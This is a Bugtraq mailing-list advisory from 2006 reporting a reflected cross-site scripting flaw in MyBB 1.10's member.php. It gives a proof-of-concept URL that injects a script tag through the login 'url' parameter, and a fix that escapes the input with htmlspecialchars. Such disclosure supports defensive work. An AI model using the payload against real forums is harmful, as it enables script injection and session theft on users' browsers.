[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MyBB 1.10 New CrossSiteScripting ' member.php '

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MyBB 1.10 New CrossSiteScripting ' member.php '
From: o.y.6@xxxxxxxxxxx
Date: 12 Apr 2006 19:29:54 -0000

//-- MyBB 1.10 New CrossSiteScripting ' member.php ' --//

Webattack :-
        
/mybb/member.php?action=do_login&username=[usrname]&password=[pass]&url="><script>alert(1);</script>

//-- FixIT --//

        Open member.php
    GoTo Line :- 1030 ..


        if($mybb->input['url'])
                        {
                                redirect($mybb->input['url'], 
$lang->redirect_loggedin);
                        }


        Replace It With

                if($mybb->input['url'])
                        {
                redirect(htmlspecialchars($mybb->input['url']), 
$lang->redirect_loggedin);
                        }
//-- --//

Prev by Date: Re: Jupiter CMS <= 1.1.5 multiple XSS attack vectors.
Next by Date: SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit
Previous by thread: Re: Jupiter CMS <= 1.1.5 multiple XSS attack vectors.
Next by thread: SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit
Index(es):
- Date
- Thread